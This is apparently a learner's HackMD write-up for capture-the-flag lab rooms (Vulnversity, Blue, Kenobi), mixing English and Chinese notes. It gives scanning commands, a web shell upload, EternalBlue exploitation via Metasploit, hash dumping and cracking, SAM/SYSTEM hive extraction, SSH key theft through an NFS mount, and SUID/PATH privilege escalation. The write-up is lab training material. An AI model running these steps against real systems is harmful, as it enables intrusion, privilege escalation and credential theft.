Getting Stare - HackMD

# Getting Stare [TOC] # Vulnversity ## Reconnaissance >Scan the box, how many ports are open? ``` nmap -sC -sV -A -Pn -T4 10.10.141.180 ``` Ans:6 --- >What version of the squid proxy is running on the machine? ![](https://i.imgur.com/yMbxs6h.png) >How many ports will nmap scan if the flag **-p-400 **was used? Ans: 400 --- >Using the nmap flag **-n** what will it not resolve? Ans DNS --- >What is the most likely operating system this machine is running? Adding -sV option --- ![](https://i.imgur.com/64zJ9y3.png) ![](https://i.imgur.com/irDchJ0.png) ![](https://i.imgur.com/dvnMBXd.png) --- > What port is the web server running on? ![](https://i.imgur.com/TMmLcZy.png) Knowing all open services (which can all be points of exploitation) is very important, Always scan ports after 1000 (even if you leave scanning in the background) ## Locating directories using GoBuster Scanning the website to find any hidden directories GoBuster - brute-force URIs (directories and files) - DNS subdomains - virtual host names Install the tools ``` sudo apt-get install gobuster ``` [Gobuster](/vG5G0iawSNC6lcXunlkTwA) >What is the directory that has an upload form page? ``` gobuster dir -t 20 -u http://10.10.141.180:3333 -w sam-cc-parameters-lowercase-all.txt ``` ![](https://i.imgur.com/YU9R0vE.png) ## Compromise the webserver what extension is allowed? ![](https://i.imgur.com/Wp3tNTN.png) Upload web shell.phtml Try to trigger the webshell ![](https://i.imgur.com/DTwnugY.png) http://10.10.141.180:3333/internal/uploads ![](https://i.imgur.com/0Rn0X3C.png) --- What is the name of the user who manages the webserver? ``` cat /etc/passwd | grep home ``` ![](https://i.imgur.com/gm44ANJ.png) Ans: Bill >What is the user flag? ![](https://i.imgur.com/IGW0Qz0.png) --- > Become root and get the last flag (/root/root.txt) ``` TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/flag" [Install] WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF ``` ![](https://i.imgur.com/jxkbolj.png) # Blue Deploy & hack into a Windows machine, leveraging common misconfigurations issues. >How many ports are open with a port number under 1000? ``` nmap -sV -sC -Pn -A -T4 <IP> ``` ![](https://i.imgur.com/kbJbROa.png) Ans: 3 >What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) Ans: ms17-010 ![](https://i.imgur.com/kchesx4.png) ## Gain Access >Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........) exploit/windows/smb/ms17_010_eternalblue ## Escalate Escalate privileges, learn how to upgrade shells in metasploit. >If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) --- >List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\\SYSTEM and write down the process id (far left column). ![](https://i.imgur.com/s7HEXlD.png) --- >Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time. current pid 504 ![](https://i.imgur.com/DLNHGWx.png) ``` migrate ``` ![](https://i.imgur.com/atldiWF.png) ![](https://i.imgur.com/iTl1QnM.png) ## Cracking Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? ![](https://i.imgur.com/NSG3SWl.png) John ``` john --wordlist=../../wordlists/rockyou.txt crack.txt --format=NT ``` ![](https://i.imgur.com/51nes4p.png) ## Find flags! >Flag1? _This flag can be found at the system root. _ ![](https://i.imgur.com/aPCM5s4.png) >Flag2? _This flag can be found at the location where passwords are stored within Windows._ [reference ](https://security.stackexchange.com/questions/63890/does-windows-have-a-built-in-password-store) ### Windows Credentials Yes, they are stored hashed within files in the `c:\Windows\System32\Config\` directory. You will need the `SAM` and `system` files. However, a backup of these files may be stored in the Windows repair folder at `c:\Windows\Repair\`. `SAM` contains the hashed passwords, however they are encrypted using the boot key within the `system` file. ``` C:\>reg.exe save HKLM\SAM sam The operation completed successfully C:\>reg.exe save HKLM\SYSTEM sys The operation completed successfully ``` > flag3? _This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved. _ ![](https://i.imgur.com/7WIDOYJ.png) # Kenobi Exploiting a Linux machine ## Recon >Scan the machine with nmap, how many ports are open? ``` import subprocess # commands cmd = "nmap -sC -sV -PN -A -T4 10.10.130.98" print("script is running. Author:meowhecker") # new process p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # retrive the result stdout, stderr = p.communicate() # output print(stdout.decode()) print(stderr.decode()) ``` ![](https://i.imgur.com/UzDGHQC.png) ## Enumerating Samba Samba is a software ![](https://i.imgur.com/jGPLTmn.png) ### SMB ->139 port NetBIOS (Layer 4) It allow the windows machine to talk to each other on the same network ->445 port Enumerate SMB folder ``` nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.130.98 ``` ### Connect to SMB server Client -> Server ``` smbclient //10.10.139.98/anoymous ``` >Once you're connected, list the files on the share. What is the file can you see? #### Download the specific file ``` get log.txt ``` ![](https://i.imgur.com/8FoHJ1y.png) ### Download the SMB share folder ``` smbget -R smb://<ip>/anonymous ``` >What port is FTP running on? ![](https://i.imgur.com/zixpSZ4.png) ## RPC remote procedure call Remote Procedure Call (RPC) 是一種通訊協定，它允許在不同電腦之間呼叫遠端程序，就像呼叫本地程序一樣。RPC 可以讓不同電腦上的程序像在同一台電腦上一樣運作。它通常用於分散式系統中，例如分散式應用程式和分散式數據庫。 ![](https://i.imgur.com/G57csd2.png) NFS(network file systems) 是一個RPC Service port 111 is access to a network file system. Lets use nmap to enumerate this. ``` nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.130.98 ``` ![](https://i.imgur.com/pvezCAb.png) ## Gain initial access with ProFtpd ProFtpd is a free and open-source FTP server >Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port. What is the version? ![](https://i.imgur.com/kb1QAVp.png) >How many exploits are there for the ProFTPd running? Searchsploit is basically just a command line search tool for exploit-db.com. ![](https://i.imgur.com/puOcz4q.png) ### Get the kenobi ssh key ![](https://i.imgur.com/imZSeEV.png) ![](https://i.imgur.com/ud34lUQ.png) ``` mount 10.10.130.98:/var /home/meowhecker/offensivePentesting/Kenobi/nfsShare ``` ![](https://i.imgur.com/9mmda6X.png) --- ![](https://i.imgur.com/Dgw4B8s.png) ### SSH login ``` chomd 600 id_rsa(必要設置否則會有權限問題) ssh -i id_rsa kenobi@10.10.130.98 #-i identity_file ``` ![](https://i.imgur.com/7SI4PxF.png) >What is Kenobi's user flag (/home/kenobi/user.txt)? ![](https://i.imgur.com/zTpX6b0.png) ## Privilege Escalation with Path Variable Manipulation ![](https://i.imgur.com/nZ04Cym.png) find suid file ``` find / -perm -u=s -type f -ls 2>/dev/null ``` ## odd binary file (menu) ![](https://i.imgur.com/EsTlICi.png) probably commnd ``` curl -I localhost uname -r ipconfig ``` ``` echo $PATH export PATH=/tmp:$PATH ``` ![](https://i.imgur.com/Yz69JhX.png) --- ![](https://i.imgur.com/qb7oMtd.png)